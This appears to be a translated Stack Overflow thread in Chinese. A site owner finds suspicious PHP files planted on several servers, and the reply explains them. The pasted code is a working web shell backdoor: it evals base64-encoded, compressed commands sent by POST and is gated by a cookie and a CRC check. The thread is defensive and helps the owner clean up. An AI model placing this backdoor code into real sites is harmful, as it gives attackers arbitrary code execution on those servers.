我发现以下代码出现在我的多个服务器网站上的两个相同的 .php 文件中。这些文件具有不显眼的名称,例如“reminder.php”(但每次名称不同)并出现在我的/scripts/和/uploads/文件夹中,有时出现在其他文件夹中。
它们的出现并非完全随机,但我对 Apache 服务器或 PHP 了解不够,无法知道 a) 它是如何出现的 b) 它的作用。
查看日志,它们都在相似的时间出现并且被调用一次,仅此而已。
如有任何帮助,我们将不胜感激。
if (isset($_COOKIE["adm"])) {
if (isset($_POST['crc'], $_POST['cmd'])) {
if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
eval(gzuncompress(base64_decode($_POST['cmd'])));
} else
echo "repeat_cmd";
}
}
最佳答案
该文件允许恶意人员在您的系统上执行他们想要的任何 PHP 代码。
基本上,如果满足某些验证(即恶意人员具有给定的 cookie 值),它将采用 POSTed“cmd”、base64 解码、gzip 解压缩,并将其评估为 PHP。
我建议更改您的密码,并可能重新安装 apache 以备不时之需。立即删除这些文件,或者如果可能的话,从备份中恢复。
关于PHP 代码帮助 - 破解 apache 服务器,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/6797374/